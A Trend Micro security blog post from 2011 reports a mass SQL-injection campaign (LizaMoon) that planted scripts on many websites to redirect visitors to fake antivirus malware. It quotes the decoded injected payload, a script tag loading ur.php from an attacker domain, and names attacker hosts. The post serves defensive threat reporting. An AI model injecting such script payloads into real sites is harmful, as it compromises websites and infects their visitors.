Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us

    We’re currently monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV.

    Based on Google searches, there is no common denominator in terms of the industry to which the compromised sites belong. We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others.

    More URLs Involved

    Investigations revealed that five URLs were used for the attack and were inserted into the compromised sites through SQL injection. The said URLs all resolve to a single IP server—a known malicious IP Trend Micro researchers are monitoring. Thus, the related URLs have been proactively blocked by Trend Micro as early as March 25, 2011:

    • {BLOCKED}
    • {BLOCKED}
    • {BLOCKED}
    • {BLOCKED}
    • {BLOCKED}

    New developments are currently being observed. We’re seeing compromised websites that were previously inserted with a script leading to {BLOCKED} already modified to connect to {BLOCKED} The said URL also resolves to the same IP server as the four previously mentioned URLs. It is possible that the cybercriminal behind this attack is updating the compromised sites with new URLs to connect to since the previous ones are already being blocked.

    Infection Chain Leads to FAKEAV and WORID

    So far, the infection chain has been typical. Visiting a compromised website with the malicious script leads to any of the above-mentioned URLs, which then triggers a series of redirections, finally leading to the download of malicious files. The redirections are visible to the user, as the displayed pages show a fake antivirus scan. The scan is, of course, fake, and is the first part of the whole FAKEAV scam, followed by a prompt to download a malicious file disguised as an installer.

    Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.

    Web compromises such as this one are not uncommon but do pose a great threat, especially if a particular website with high incoming traffic is among those compromised. Trend Micro, through the Smart Protection Network™ protects users from being affected by this compromise, as the related malicious URLs are already blocked and the malicious files detected.

    Website owners who suspect that their websites have been compromised are advised to clean up their sites as soon as possible.

    Update as of April 6, 2011 2:00 AM Pacific Time

    Further analysis reveals that ASPX and ASP web app sites are being exploited by a GET request containing parameters with SQL statements and the encoded script tag and URL shown below:

    This resolves to the following:

    </title><script src=http://{BLOCKED}on(dot)com/ur.php></script>

    We also found that attackers were using a certain IP ({BLOCKED}.{BLOCKED}.29.190) to try to inject sites with lizamoon(dot)com/ur.php and other URLs pointing to the same IP location as lizamoon. We saw the said IP address trying to compromise a web server located in the APAC region using the following technique.

    Trend Micro customers using Threat Discovery Appliance (TDA) as well as Deep Security are already protected from having their sites compromised using the mentioned technique.

    Clean up efforts as well as development of fixes have reportedly started to mitigate the effects of the massive attack. However, we’re also still seeing new URLs being injected into websites, connecting to an IP server different from the one previously used. We’ve already blocked access to the said URLs.

    Considering such developments, website owners of both infected and non-infected sites are strongly advised to take action. Owners of infected sites should clean up their sites and apply security updates to all software, and those not affected should make sure that their sites are not vulnerable to similar attacks, such as making sure that all inputs to the website are well-validated.

    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice